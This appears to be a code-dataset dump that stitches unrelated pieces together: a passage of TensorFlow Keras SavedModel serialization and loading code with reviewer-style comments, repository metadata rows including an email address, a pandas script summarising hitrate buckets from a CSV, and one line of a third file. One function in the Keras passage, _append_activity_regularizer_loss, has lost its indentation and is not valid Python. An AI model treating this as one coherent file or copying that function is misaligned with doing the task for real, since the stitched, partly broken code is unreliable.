                    'error occurred while tracing layer functions. Error '
                    'message: {}'.format(layer, e))
  else:
    # Add checkpointable objects and functions to the SerializedAttribute object
    # only if all functions are successfully traced.
    # The `set_and_validate_*` function ensures that all required attributes are
    # exported with the correct type.
    serialized_attr.set_and_validate_objects(object_dict)
    serialized_attr.set_and_validate_functions(function_dict)
  return serialized_attr
def _should_skip_serialization(layer):
  """Returns True when the layer lacks the input info needed to trace it."""
  if isinstance(layer, training_lib.Model):
    try:
      # Accessing these raises AttributeError when the model was never called
      # and no input shapes were recorded, so no call signature can be traced.
      layer.inputs  # pylint:disable=pointless-statement
      layer.input_names  # pylint:disable=pointless-statement
    except AttributeError:
      # The user may still save an object with this Model attached; don't fail
      # the whole tf.saved_model.save -- just skip the extra Keras attributes.
      logging.warning('Skipping full serialization of Keras model {}, because '
                      'its inputs are not defined.'.format(layer))
      return True
    return False
  if not layer.built:
    logging.warning('Skipping full serialization of Keras layer {}, because '
                    'it is not built.'.format(layer))
    return True
  return False
def _wrap_layer_objects(layer, serialization_cache):
  """Returns extra trackable objects to attach to the serialized layer.

  Args:
    layer: Keras Layer object.
    serialization_cache: Dictionary shared between all objects during
      serialization.

  Returns:
    A dictionary containing all checkpointable objects from a
    SerializedAttributes object. See LayerAttributes and ModelAttributes for
    entire list of objects
  """
  # Wrap all regularization losses as tf.functions.
  # First, generate list of all regularization losses in this layer and
  # sublayers.
  all_losses = layer._callable_losses[:]  # pylint: disable=protected-access
  for child_layer in _list_all_layers(layer):
    all_losses.extend(child_layer._callable_losses)  # pylint: disable=protected-access
  # Next, wrap all loss functions as tf.functions. Use the serialization cache
  # to store already-wrapped functions. The cache is shared across the whole
  # save, so a loss shared by several layers is wrapped exactly once.
  keras_loss_cache = serialization_cache.setdefault('keras_losses', {})
  wrapped_loss_functions = []
  for loss_fn in all_losses:
    if loss_fn in keras_loss_cache:
      wrapped_loss_functions.append(keras_loss_cache[loss_fn])
    else:
      # The cache size doubles as a unique index for naming the wrapped loss.
      wrapped_loss = _wrap_unconditional_loss(loss_fn, len(keras_loss_cache))
      keras_loss_cache[loss_fn] = wrapped_loss
      wrapped_loss_functions.append(wrapped_loss)
  # Losses owned directly by this layer (excluding sublayers); every entry was
  # just added to the cache above.
  wrapped_layer_losses = [keras_loss_cache[fn]
                          for fn in layer._callable_losses[:]]  # pylint: disable=protected-access
  return dict(
      variables=data_structures.ListWrapper(layer.variables),
      trainable_variables=data_structures.ListWrapper(
          layer.trainable_variables),
      non_trainable_variables=data_structures.ListWrapper(
          layer.non_trainable_variables),
      layers=data_structures.ListWrapper(_list_all_layers(layer)),
      metrics=data_structures.ListWrapper(layer.metrics),
      regularization_losses=data_structures.ListWrapper(
          wrapped_loss_functions),
      layer_regularization_losses=data_structures.ListWrapper(
          wrapped_layer_losses))
def _wrap_layer_functions(layer, serialization_cache):
  """Returns dict of wrapped layer call function and losses in tf.functions.

  Args:
    layer: Keras Layer object.
    serialization_cache: Dictionary shared between all objects during
      serialization.

  Returns:
    A dictionary containing all keras tf.functions to serialize. See
    LayerAttributes and ModelAttributes for the list of all attributes.
  """
  # Since Sequential models may be modified in place using model.add() or
  # model.pop(), don't use saved functions.
  if (isinstance(layer, RevivedLayer) and
      not isinstance(layer, RevivedSequential)):
    return {fn_name: getattr(layer.keras_api, fn_name, None)
            for fn_name in LayerAttributes.all_functions}
  # Reset the losses of the layer and its children. The call function in each
  # child layer is replaced with tf.functions.
  original_fns = _replace_child_layer_functions(layer, serialization_cache)
  original_losses = _reset_layer_losses(layer)
  # Wrap all the layer call and activity regularizer functions.
  # Use LayerCallCollection to ensure that all layer call functions (__call__,
  # call with losses) are traced with the same inputs.
  call_collection = LayerCallCollection(layer)
  call_fn_with_losses = call_collection.add_function(
      _wrap_call_and_conditional_losses(layer),
      '{}_layer_call_and_return_conditional_losses'.format(layer.name))
  call_fn = call_collection.add_function(
      _extract_outputs_from_fn(layer, call_fn_with_losses),
      '{}_layer_call_fn'.format(layer.name))
  fns = {'call_and_return_conditional_losses': call_fn_with_losses,
         '__call__': call_fn}
  if layer.activity_regularizer is not None:
    fns['activity_regularizer_fn'] = _wrap_activity_regularizer(layer)
    fns['call_and_return_all_conditional_losses'] = (
        call_collection.add_function(
            _append_activity_regularizer_loss(call_fn_with_losses,
                                              fns['activity_regularizer_fn']),
            '{}_layer_call_and_return_all_conditional_losses'.format(layer.name)
        ))
  else:
    # Without an activity regularizer, "all conditional losses" is identical
    # to the plain conditional-losses function.
    fns['activity_regularizer_fn'] = None
    fns['call_and_return_all_conditional_losses'] = call_fn_with_losses
  # Manually trigger traces before restoring the overwritten functions. The
  # functions are traced within the layer call context to ensure that layer
  # functions (e.g. add_loss) behave as though running in graph mode.
  with base_layer_utils.call_context().enter(layer, None, True, None):
    for fn in fns.values():
      if fn is not None and fn.input_signature is not None:
        fn.get_concrete_function()
  # Restore overwritten functions and losses.  Order matters: restoring child
  # functions before losses keeps the layer tree in its pre-serialization
  # state.
  _restore_child_layer_functions(original_fns)
  _restore_layer_losses(original_losses)
  return fns
def _default_save_signature(layer):
  """Traces the model call function with layer losses temporarily cleared."""
  saved_losses = _reset_layer_losses(layer)
  traced_call = saving_utils.trace_model_call(layer)
  traced_call.get_concrete_function()
  _restore_layer_losses(saved_losses)
  return traced_call
def _list_all_layers(obj):
  """Returns the direct child layers of a model or layer."""
  if not isinstance(obj, training_lib.Model):
    # Plain layers track sublayers in `_layers`; drop empty containers.
    return trackable_layer_utils.filter_empty_layer_containers(obj._layers)  # pylint: disable=protected-access
  return obj.layers
def _replace_child_layer_functions(layer, serialization_cache):
  """Replaces functions in the children layers with wrapped tf.functions.

  This step allows functions from parent layers to reference the wrapped
  functions from their children layers instead of retracing the ops.

  This function also resets all losses stored in the layer. These are stored in
  the returned dictionary. Use `_restore_child_layer_functions` to restore
  the original attributes.

  NOTE(review): the 'losses' entry documented below is not actually populated
  by this function; losses are saved/reset by `_reset_layer_losses` instead.

  Args:
    layer: Keras Layer object.
    serialization_cache: Dictionary shared between all objects during
      serialization.

  Returns:
    Dictionary mapping layer objects -> original functions and losses:
      { Child layer 1: {
          'losses': Original losses,
          'call': Original call function
          'activity_regularizer': Original activity regularizer},
        Child layer 2: ...
      }
  """
  # pylint: disable=protected-access
  original_fns = {}
  for child_layer in _list_all_layers(layer):
    if child_layer not in serialization_cache[_KERAS_CACHE_KEY]:
      # Child not serialized yet; serialize it now to obtain its wrapped
      # functions.
      layer_fns = (serialize_all_attributes(child_layer, serialization_cache)
                   .functions)
    else:
      layer_fns = serialization_cache[_KERAS_CACHE_KEY][child_layer].functions
    if not layer_fns:
      # This indicates either:
      #   - circular dependency, which means the current layer's functions
      #     should be wrapped first.
      #   - Child layer's inputs are not defined, so its functions have not been
      #     wrapped. In this case, no replacement is necessary so move on to the
      #     next child.
      continue
    # Save the originals so _restore_child_layer_functions can undo this.
    original_fns[child_layer] = {
        'call': child_layer.call,
        'activity_regularizer': child_layer.activity_regularizer
    }
    with trackable.no_automatic_dependency_tracking_scope(child_layer):
      try:
        child_layer.activity_regularizer = layer_fns.get(
            'activity_regularizer_fn')
      except AttributeError:
        # Some layers have an unsettable activity regularizer.
        pass
      child_layer.call = _use_wrapped_call(
          child_layer, layer_fns['call_and_return_conditional_losses'])
  return original_fns
# pylint: enable=protected-access
def _restore_child_layer_functions(original_fns):
  """Restores attributes replaced with `_replace_child_layer_functions`."""
  for child_layer, saved_attrs in original_fns.items():
    with trackable.no_automatic_dependency_tracking_scope(child_layer):
      child_layer.call = saved_attrs['call']
      try:
        child_layer.activity_regularizer = saved_attrs['activity_regularizer']
      except AttributeError:
        # The layer exposes activity_regularizer as a read-only property.
        pass
# pylint: disable=protected-access
def _reset_layer_losses(parent_layer):
  """Clears losses on a layer tree and returns the originals for restoration."""
  saved_losses = {}
  affected_layers = _list_all_layers(parent_layer) + [parent_layer]
  for sub_layer in affected_layers:
    saved_losses[sub_layer] = {
        'losses': sub_layer._losses[:],
        'eager_losses': sub_layer._eager_losses[:],
    }
    with trackable.no_automatic_dependency_tracking_scope(sub_layer):
      sub_layer._losses = []
      sub_layer._eager_losses = []
  return saved_losses
def _restore_layer_losses(losses_dict):
  """Reattaches losses previously saved by `_reset_layer_losses`."""
  for sub_layer, saved in losses_dict.items():
    with trackable.no_automatic_dependency_tracking_scope(sub_layer):
      sub_layer._losses = saved['losses']
      sub_layer._eager_losses = saved['eager_losses']
# pylint: enable=protected-access
def _use_wrapped_call(layer, call_fn):
  """Creates fn that adds the losses returned by call_fn & returns the outputs.

  Args:
    layer: A Keras layer object
    call_fn: tf.function returned by _wrap_call_and_conditional_losses.

  Returns:
    function that calls call_fn and returns the outputs. Losses returned by
    call_fn are added to the layer losses.
  """
  # TODO(kathywu): Support mask argument and multi-input call functions.
  def wrapped_call(inputs, **kwargs):
    """Returns the outputs from the call_fn, and adds the losses."""
    if layer._expects_training_arg:  # pylint: disable=protected-access
      training = kwargs.pop('training', None)
      if training is None:
        # No explicit training mode was passed; fall back to the global
        # learning phase, which may be a tensor — hence the smart_cond below.
        training = K.learning_phase()
      outputs, losses = tf_utils.smart_cond(
          training,
          lambda: call_fn(inputs, training=True),
          lambda: call_fn(inputs, training=False))
    else:
      outputs, losses = call_fn(inputs)
    # Re-attach the conditional losses so Keras training loops pick them up.
    layer.add_loss(losses, inputs)
    return outputs
  return wrapped_call
class LayerCallCollection(object):
  """Groups wrapped layer call functions.

  This is used to ensure that all layer call functions are traced with the same
  inputs-
    - call
    - call_and_return_conditional_losses
    - call_and_return_all_conditional_losses
  """

  def __init__(self, layer):
    self._layer = layer
    self._expects_training_arg = layer._expects_training_arg  # pylint: disable=protected-access
    self._input_signature = self._generate_input_signature(layer)
    # Held weakly so the collection does not keep traced functions alive
    # beyond serialization.
    self._functions = weakref.WeakValueDictionary()
    # Bool indicating whether this object is currently tracing the layer call
    # functions.
    self.tracing = False

  def _generate_input_signature(self, layer):
    """Inspects layer object and returns the inferred input signature.

    Args:
      layer: Layer object.

    Returns:
      List of possibly nested TensorSpecs of the layer call function inputs.
      The list does not contain the `training` argument.
    """
    if (isinstance(layer.call, def_function.Function) and
        layer.call.input_signature is not None):
      # The user already fixed a signature on the call function; honor it.
      return layer.call.input_signature
    else:
      if isinstance(layer, training_lib.Model):
        return saving_utils.model_input_signature(layer)
      elif layer.input_spec is not None:

        def to_tensor_spec_or_none(x):
          spec = input_spec.to_tensor_spec(x, layer.dtype)
          # If the shape is too general (e.g. multiple dimensions are allowed),
          # return None so that separate functions can be generated for each
          # inferred input signature.
          # TODO(b/134962016): currently partial signatures are not supported.
          if spec.shape == tensor_shape.TensorShape(None):
            return None
          return spec
        input_signature = [nest.map_structure(
            to_tensor_spec_or_none, layer.input_spec)]
        return input_signature
      else:
        return None

  def add_trace(self, *args, **kwargs):
    """Traces all functions with the same args and kwargs.

    Args:
      *args: Positional args passed to the original function.
      **kwargs: Keyword args passed to the original function.
    """
    kwargs = kwargs.copy()
    # Guard flag: LayerCall checks this to avoid re-entering add_trace while a
    # trace is already in progress.
    self.tracing = True
    for fn in self._functions.values():
      # TODO(kathywu): Replace arguments with broader shapes defined in the
      # input signature.
      if self._expects_training_arg:
        # Trace both training modes so either can be served after loading.
        kwargs['training'] = False
        fn.original_get_concrete_function(*args, **kwargs)
        kwargs['training'] = True
        fn.original_get_concrete_function(*args, **kwargs)
      else:
        fn.original_get_concrete_function(*args, **kwargs)
    self.tracing = False

  @property
  def fn_input_signature(self):
    """Returns input signature for the wrapped layer call function."""
    if self._expects_training_arg:
      # The training arg is left as a python boolean, so the call functions
      # will not have an input signature (input signatures may only describe
      # tensor arguments).
      return None
    if None in nest.flatten(self._input_signature):
      # TODO(b/134962016): If input signature cannot be partially defined.
      return None
    return self._input_signature

  def add_function(self, python_function, name):
    """Adds a layer call function to the collection."""
    self._functions[name] = fn = LayerCall(
        self, python_function, name,
        input_signature=self.fn_input_signature)
    if (None not in nest.flatten(self._input_signature) and
        self._expects_training_arg):
      # Manually add traces for layers that expect a training argument and have
      # a fully defined input signature.
      self.add_trace(*self._input_signature)
    return fn
class LayerCall(def_function.Function):
  """Function that triggers traces of other functions in the same collection."""

  def __init__(self, call_collection, *args, **kwargs):
    super(LayerCall, self).__init__(*args, **kwargs)
    # Sibling call functions that must be traced with the same arguments
    # (see LayerCallCollection.add_trace).
    self.call_collection = call_collection

  def __call__(self, *args, **kwargs):
    if not self.call_collection.tracing:
      self.call_collection.add_trace(*args, **kwargs)
    return super(LayerCall, self).__call__(*args, **kwargs)

  def get_concrete_function(self, *args, **kwargs):
    if not self.call_collection.tracing:
      self.call_collection.add_trace(*args, **kwargs)
    return super(LayerCall, self).get_concrete_function(*args, **kwargs)

  def original_get_concrete_function(self, *args, **kwargs):
    # Bypasses the add_trace hook above; used by add_trace itself to avoid
    # infinite recursion.
    return super(LayerCall, self).get_concrete_function(*args, **kwargs)
def _wrap_call_and_conditional_losses(layer):
  """Wraps call function that returns a tuple of (outputs, losses).

  The losses returned are conditional on the inputs passed to the call function.
  Unconditional losses (e.g. weight regularizeration) are wrapped separately.

  Args:
    layer: a Keras layer object

  Returns:
    python call function that returns outputs and conditional losses -- excludes
    activity regularizer
  """
  # Create function that generates both outputs and losses
  layer_call = layer.call
  if layer._expects_training_arg:  # pylint: disable=protected-access
    def call_and_return_conditional_losses(inputs, training=False):
      return layer_call(inputs, training=training), layer.get_losses_for(inputs)
  else:
    def call_and_return_conditional_losses(inputs):
      # NOTE(review): this mutates the *global* Keras learning phase as a side
      # effect of calling the wrapped function; confirm that forcing inference
      # mode here is intended.
      K.set_learning_phase(0)
      return layer_call(inputs), layer.get_losses_for(inputs)
  return call_and_return_conditional_losses
def _extract_outputs_from_fn(layer, call_and_return_conditional_losses):
  """Returns a function that drops the losses and returns only the outputs."""
  if isinstance(layer, RevivedLayer):
    # Revived layers already expose an outputs-only call function.
    return layer.keras_api.__call__  # pylint: disable=protected-access
  expects_training = layer._expects_training_arg  # pylint: disable=protected-access
  if expects_training:
    def call(inputs, training=False):
      outputs, _ = call_and_return_conditional_losses(inputs, training=training)
      return outputs
  else:
    def call(inputs):
      outputs, _ = call_and_return_conditional_losses(inputs)
      return outputs
  return call
def _append_activity_regularizer_loss(
call_fn_with_losses, activity_regularizer_fn):
"""Appends activity regularizer loss to losses returned by the wrapped fn."""
def fn(*args, **kwargs):
outputs, losses = call_fn_with_losses(*args, **kwargs)
losses.append(activity_regularizer_fn(outputs))
return outputs, losses
return fn
def _wrap_unconditional_loss(loss_fn, index):
  """Wraps callable/unconditonal loss, returning a serializable function."""
  # Losses may arrive as functools.partial objects (e.g. a regularizer bound
  # to a weight); extract the underlying callable first.
  if isinstance(loss_fn, functools.partial):
    underlying_fn = loss_fn.args[0]
  else:
    underlying_fn = loss_fn
  if isinstance(underlying_fn, def_function.Function):
    return underlying_fn
  return def_function.Function(
      underlying_fn, 'loss_fn_{}'.format(index), input_signature=[])
def _wrap_activity_regularizer(layer):
  """Wraps the activity regularizer."""
  regularizer = layer.activity_regularizer
  if isinstance(regularizer, def_function.Function):
    # Already a tf.function; nothing to wrap.
    return regularizer
  signature = [tensor_spec.TensorSpec(None, layer.dtype or K.floatx())]
  return def_function.Function(
      regularizer,
      '{}_activity_regularizer'.format(layer.name),
      input_signature=signature)
def load_from_saved_model_v2(path, compile=True):  # pylint: disable=redefined-builtin
  """Loads Keras objects from a SavedModel.

  Any Keras layer or model saved to the SavedModel will be loaded back
  as Keras objects. Other objects are loaded as regular trackable objects (same
  as `tf.saved_model.load`).

  Currently, Keras saving/loading only retains the Keras object's weights,
  losses, and call function.

  The loaded model can be re-compiled, but the original optimizer, compiled loss
  functions, and metrics are not retained. This is temporary, and `model.save`
  will soon be able to serialize compiled models.

  Args:
    path: Path to SavedModel.
    compile: If true, compile the model after loading it.

  Returns:
    Object loaded from SavedModel.
  """
  # TODO(kathywu): Add saving/loading of optimizer, compiled losses and metrics.
  # TODO(kathywu): Add code to load from objects that contain all endpoints
  model = load.load_internal(path, loader_cls=KerasObjectLoader)
  if isinstance(model, RevivedModel) and compile:
    # TODO(kathywu): Use compiled objects from SavedModel, instead of
    # creating new objects from the training config.
    if model._training_config is not None:  # pylint: disable=protected-access
      # Rebuild the optimizer/loss/metrics from the serialized training config.
      model.compile(**saving_utils.compile_args_from_training_config(
          model._training_config))  # pylint: disable=protected-access
  return model
# Attributes that are detached from revived objects after loading: every
# serialized function/checkpointable endpoint plus the "keras_api" attribute
# (see KerasObjectLoader._finalize and RevivedLayer._revive_setter).
PUBLIC_ATTRIBUTES = CommonEndpoints.all_functions.union(
    CommonEndpoints.all_checkpointable_objects)
PUBLIC_ATTRIBUTES.add(_KERAS_ATTR)
class KerasObjectLoader(load.Loader):
  """Loader that recreates Keras objects."""

  def __init__(self, *args, **kwargs):
    super(KerasObjectLoader, self).__init__(*args, **kwargs)
    self._finalize()

  def _finalize(self):
    """Post-processes revived nodes after the object graph has been restored."""
    # pylint: disable=protected-access
    for node in self._nodes:
      if isinstance(node, RevivedModel):
        # Recover the model input spec from the serialized call function,
        # either from its fixed signature or by merging its traced signatures.
        call_fn = node.keras_api.call_and_return_conditional_losses
        if call_fn.input_signature is None:
          inputs = infer_inputs_from_restored_call_function(call_fn)
        else:
          inputs = call_fn.input_signature[0]
        if isinstance(node, RevivedSequential):
          # Rebuild the Sequential by re-adding its serialized layers.
          with trackable.no_automatic_dependency_tracking_scope(node):
            node._layers = []
          for layer in node.keras_api.layers:
            node.add(layer)
        if not node.inputs:
          # Since this revived object is technically a subclassed model (even if
          # the original model is functional/sequential), inputs should be set.
          node._set_inputs(inputs)
      if isinstance(node, RevivedLayer):
        if hasattr(node.keras_api, 'layer_regularization_losses'):
          losses = getattr(node.keras_api, 'layer_regularization_losses', [])
        else:
          # Some earlier SavedModels may not have layer_regularization_losses
          # serialized separately. Fall back to using the regularization_losses
          # list if it does not exist.
          losses = node._serialized_attributes.get('regularization_losses', [])
        for loss in losses:
          node.add_loss(loss)

        # Use wrapped activity regularizer function if the layer's activity
        # regularizer wasn't created during initialization.
        if node.activity_regularizer is None:
          node.activity_regularizer = getattr(node.keras_api,
                                              'activity_regularizer_fn', None)

        # Now that the node object has been fully loaded and restored from the,
        # checkpoint, the object no longer needs to track objects added from
        # SerializedAttributes. (Note that saving a training checkpoint still
        # functions correctly, because layers and variables are tracked
        # separately by the Layer object.)
        # TODO(kathywu): Instead of outright deleting these nodes (which would
        # make restoring from a different checkpoint tricky), mark them as extra
        # dependencies that are OK to overwrite.
        for name in PUBLIC_ATTRIBUTES:
          delete_tracking(node, name)
    # pylint: enable=protected-access

  def _recreate_base_user_object(self, proto):
    """Revives Keras objects by proto identifier; defers others to the base."""
    revived_classes = {
        '_tf_keras_layer': (RevivedLayer, base_layer.Layer),
        '_tf_keras_network': (RevivedNetwork, network_lib.Network),
        '_tf_keras_model': (RevivedModel, training_lib.Model),
        '_tf_keras_sequential': (RevivedSequential, models_lib.Sequential)
    }

    parent_classes = revived_classes.get(proto.identifier, None)
    if parent_classes is not None:
      # NOTE(review): this second lookup is redundant with the .get() above.
      parent_classes = revived_classes[proto.identifier]
      metadata = json.loads(proto.metadata)
      # Dynamically build a class named after the original Keras class, mixing
      # the Revived* behavior with the real Keras base class.
      revived_cls = type(
          compat.as_str(metadata['class_name']),
          parent_classes,
          {'__setattr__': parent_classes[1].__setattr__})
      obj = revived_cls._init_from_metadata(metadata)  # pylint: disable=protected-access
      return obj, revived_cls._revive_setter  # pylint: disable=protected-access

    return super(KerasObjectLoader, self)._recreate_base_user_object(proto)
# TODO(kathywu): Centrally define keys and functions for both serialization and
# deserialization.
class RevivedLayer(object):
  """Keras layer loaded from a SavedModel."""

  @classmethod
  def _init_from_metadata(cls, metadata):
    """Create revived layer from metadata stored in the SavedModel proto."""
    init_args = dict(
        name=metadata['name'],
        trainable=metadata['trainable'])
    if metadata.get('dtype') is not None:
      init_args['dtype'] = metadata['dtype']
    if metadata.get('batch_input_shape') is not None:
      init_args['batch_input_shape'] = metadata['batch_input_shape']

    revived_obj = cls(**init_args)

    with trackable.no_automatic_dependency_tracking_scope(revived_obj):
      # pylint:disable=protected-access
      revived_obj._expects_training_arg = metadata['expects_training_arg']
      if metadata.get('config') is not None:
        revived_obj._config = metadata['config']
      if metadata.get('input_spec') is not None:
        revived_obj.input_spec = recursively_deserialize_keras_object(
            metadata['input_spec'],
            module_objects={'InputSpec': input_spec.InputSpec})
      if metadata.get('activity_regularizer') is not None:
        revived_obj.activity_regularizer = regularizers.deserialize(
            metadata['activity_regularizer'])
      # Store attributes revived from SerializedAttributes in a un-tracked
      # dictionary. The attributes are the ones listed in CommonEndpoints or
      # "keras_api" for keras-specific attributes.
      revived_obj._serialized_attributes = {}
      # pylint:enable=protected-access
    return revived_obj

  def _revive_setter(self, name, value):
    """Reattaches attributes from the SavedModel to the newly revived object."""
    if name in PUBLIC_ATTRIBUTES:
      # Serialized endpoints go into _serialized_attributes (still tracked for
      # checkpointing if trackable) rather than becoming plain attributes.
      if isinstance(value, trackable.Trackable):
        self._track_trackable(value, name=name)
      self._serialized_attributes[name] = value
    else:
      setattr(self, name, value)

  @property
  def keras_api(self):
    # Keras-specific serialized endpoints (call functions, losses, etc.).
    return self._serialized_attributes[_KERAS_ATTR]

  def get_config(self):
    if hasattr(self, '_config'):
      return self._config
    else:
      # The original layer did not serialize a config.
      raise NotImplementedError

  def call(self, inputs, *args, **kwargs):
    """Calls the revived layer and add conditional losses."""
    call_fn = _use_wrapped_call(
        self, self.keras_api.call_and_return_conditional_losses)
    return call_fn(inputs, *args, **kwargs)
def recursively_deserialize_keras_object(config, module_objects=None):
  """Deserialize Keras object from a nested structure."""
  if isinstance(config, dict):
    if 'class_name' in config:
      # A serialized Keras object; hand off to the standard deserializer.
      return deserialize_keras_object(config, module_objects=module_objects)
    return {key: recursively_deserialize_keras_object(value, module_objects)
            for key, value in config.items()}
  if isinstance(config, (tuple, list)):
    return [recursively_deserialize_keras_object(item, module_objects)
            for item in config]
  raise ValueError('Unable to decode config: {}'.format(config))
def infer_inputs_from_restored_call_function(fn):
  """Returns TensorSpec of inputs from a restored call function.

  Args:
    fn: Restored layer call function. It is assumed that the inputs are entirely
      in the first argument.

  Returns:
    TensorSpec of call function inputs.
  """
  def common_spec(x, y):
    # Merge two specs into the most general spec compatible with both traces.
    return tensor_spec.TensorSpec(defun.common_shape(x.shape, y.shape),
                                  x.dtype, x.name)
  # Fold every traced concrete function's input signature into one spec.
  spec = fn.concrete_functions[0].structured_input_signature[0][0]
  for concrete in fn.concrete_functions[1:]:
    spec2 = concrete.structured_input_signature[0][0]
    spec = nest.map_structure(common_spec, spec, spec2)
  return spec
class RevivedNetwork(RevivedLayer):
  """Keras network of layers loaded from a SavedModel."""

  @classmethod
  def _init_from_metadata(cls, metadata):
    """Create revived network from metadata stored in the SavedModel proto."""
    # TODO(kathywu): Refactor logic here so that RevivedNetwork uses the
    revived_obj = cls(name=metadata['name'])

    # Networks are constructed with name only; every other attribute is
    # restored manually below (unlike RevivedLayer, which passes them to
    # __init__).
    with trackable.no_automatic_dependency_tracking_scope(revived_obj):
      # pylint:disable=protected-access
      if metadata.get('dtype') is not None:
        revived_obj._dtype = metadata['dtype']
      revived_obj.trainable = metadata['trainable']

      revived_obj._expects_training_arg = metadata['expects_training_arg']
      if metadata.get('config') is not None:
        revived_obj._config = metadata['config']

      if metadata.get('activity_regularizer') is not None:
        revived_obj.activity_regularizer = regularizers.deserialize(
            metadata['activity_regularizer'])

      # Store attributes revived from SerializedAttributes in a un-tracked
      # dictionary. The attributes are the ones listed in CommonEndpoints or
      # "keras_api" for keras-specific attributes.
      revived_obj._serialized_attributes = {}
      # pylint:enable=protected-access
    return revived_obj
class RevivedModel(RevivedNetwork):
  """Keras model loaded from a SavedModel."""

  @classmethod
  def _init_from_metadata(cls, metadata):
    """Create revived model from metadata stored in the SavedModel proto."""
    revived_obj = super(RevivedModel, cls)._init_from_metadata(metadata)

    with trackable.no_automatic_dependency_tracking_scope(revived_obj):
      # Kept so load_from_saved_model_v2 can re-compile the model.
      revived_obj._training_config = metadata.get('training_config')  # pylint:disable=protected-access

    return revived_obj
class RevivedSequential(RevivedModel):
  """Keras sequential model loaded from a SavedModel."""

  @classmethod
  def _init_from_metadata(cls, metadata):
    """Create revived Sequential model from SavedModel metadata."""
    return super(RevivedSequential, cls)._init_from_metadata(metadata)

  def call(self, *args, **kwargs):
    # Use Sequential's own call (not RevivedLayer's wrapped call) so outputs
    # are computed from the re-added layers.
    return models_lib.Sequential.call(self, *args, **kwargs)
def save(model, filepath, overwrite, include_optimizer):
  """Saves a model as a SavedModel to the filepath.

  Args:
    model: Keras model instance to be saved.
    filepath: String path to save the model.
    overwrite: whether to overwrite the existing filepath.
    include_optimizer: If True, save the model's optimizer state.

  Raises:
    ValueError: if the model's inputs have not been defined.
  """
  # If file exists and should not be overwritten.
  if not overwrite and os.path.exists(filepath):
    proceed = ask_to_proceed_with_overwrite(filepath)
    if not proceed:
      return

  if _should_skip_serialization(model):
    saving_utils.raise_model_input_error(model)

  if not include_optimizer:
    # Temporarily detach the optimizer so it is not serialized.  BUG FIX: use
    # try/finally so the optimizer is restored even if save_lib.save raises,
    # leaving the in-memory model unchanged on failure.
    orig_optimizer = model.optimizer
    model.optimizer = None
    try:
      save_lib.save(model, filepath)
    finally:
      model.optimizer = orig_optimizer
  else:
    save_lib.save(model, filepath)
| [
"sijusamuel@gmail.com"
] | sijusamuel@gmail.com |
6a1da1441b1539fa1f410d785c92f7a42e973ae5 | 99dc3d89303c1d43fada889dd074c1ed559fb85d | /qj_info.py | d557c5bbbd01f827845ae3482903489a39c7bcfe | [] | no_license | durian/Patterns | 3c66dab6b4ca9025f021c57ecf970e329da69ff8 | 9c2a161df45b0370d2623a296b1e5e460543c9e8 | refs/heads/master | 2020-06-27T01:03:49.709062 | 2019-08-01T12:16:08 | 2019-08-01T12:16:08 | 199,805,965 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,364 | py | #
# -----------------------------------------------------------------------------
# Example:
# python3 qj_info.py -f allqjs_b3g1a3_mnl1_mxl1096_2010-01_fgrp2_120m_prod.csv
#
# produced with: python3 ts06hitrates.py -f 2 -m 120 -p 2010-01 -d prod (-g9)
#
# plots with:
# python3 ts06hitrates.py -f 2 -m 120 -p 2010-01 -d prod --min_qj_len 1 --max_qj_len 15 --xmin 0 --xmax 15
#
# -----------------------------------------------------------------------------
#
import re
import sys, os, pickle
import argparse
import glob
from datetime import datetime
from datetime import timedelta
#https://stackoverflow.com/questions/35066588/is-there-a-simple-way-to-increment-a-datetime-object-one-month-in-python
from dateutil.relativedelta import relativedelta
import pandas as pd
import matplotlib as mpl
mpl.use("Qt5Agg") #TkAgg crashes
import matplotlib.pyplot as plt
from matplotlib import cm
import numpy as np
import itertools
from read_data import *
from pandas.plotting import autocorrelation_plot
from statsmodels.tsa.stattools import acf
from pandas.plotting import lag_plot
import itertools
from collections import Counter
from matplotlib.dates import MonthLocator, YearLocator, DateFormatter
from scipy import stats
import calendar
# Categorical colour palette: Tableau 20 plus extra distinct colours.
cat20_colours = [
    "#1f77b4", "#aec7e8", "#ff7f0e", "#ffbb78", "#2ca02c",
    "#98df8a", "#d62728", "#ff9896", "#9467bd", "#c5b0d5",
    "#8c564b", "#c49c94", "#e377c2", "#f7b6d2", "#7f7f7f",
    "#c7c7c7", "#bcbd22", "#dbdb8d", "#17becf", "#9edae5",
    "#469990", "#e6beff", "#9A6324", "#fffac8", "#800000",
    "#aaffc3", "#808000", "#ffd8b1", "#000075", "#a9a9a9"
]

parser = argparse.ArgumentParser()
parser.add_argument('-a', "--anon", action='store_true', default=False,
                    help='Anonymous axes')
parser.add_argument('-f', '--fn', type=str, default=None, help='File')
parser.add_argument('-l', '--lengths', type=str,
                    default="14,14,30,30,90,180,180,360", help='Lengt of QJs')
args = parser.parse_args()


def _marker(good, bad):
    """Returns '!' when a bucket has more good ("hitrate < 1") QJs than bad."""
    return "!" if good > bad else ""


qjs_df = pd.read_csv(args.fn, sep=";", index_col=0)
print(qjs_df.head(1))

# Overall good/bad counts across all QJs.
good_count = qjs_df['hitrate'][qjs_df['hitrate'] < 1.0].count()
bad_count = qjs_df['hitrate'][qjs_df['hitrate'] >= 1.0].count()
print(good_count, bad_count, _marker(good_count, bad_count))

# Per-duration-bucket breakdown: buckets are cumulative sums of --lengths.
lengths = [int(x) for x in args.lengths.split(",")]
min_l = 1
max_l = min_l
print(" <= d < num + -")
for length in lengths:
    max_l += length
    sub_df = qjs_df[(qjs_df["days"] >= min_l) & (qjs_df["days"] < max_l)]
    good_count = sub_df['hitrate'][sub_df['hitrate'] < 1.0].count()
    bad_count = sub_df['hitrate'][sub_df['hitrate'] >= 1.0].count()
    # BUG FIX: guard against ZeroDivisionError when a bucket has no bad QJs.
    ratio = good_count / bad_count if bad_count else float('inf')
    print("{:4n} -{:4n} {:4n}: {:3n} {:3n} {:.4f} {}".format(
        min_l, max_l, sub_df.shape[0], good_count, bad_count, ratio,
        _marker(good_count, bad_count)))
    min_l = max_l
"noreply@github.com"
] | noreply@github.com |
e5461f784b5376bbb9033706deb5c0c881b6746f | b3724a2dbfcffe7b99ae79703bc189e4c97839c3 | /geolife_preproc.py | 18aad7daa38d98e52d23c5a345664ff3cdb00e5a | [] | no_license | atasoglou/MATLAB | 7ad07bf652b827584f87912f8613e7d37cda4204 | 5fbc4086362c1c9c2a7fa13c97aa9a0d34e2069b | refs/heads/master | 2020-04-18T03:28:42.167063 | 2017-11-14T13:11:58 | 2017-11-14T13:11:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 533 | py | from openpyxl import load_workbook
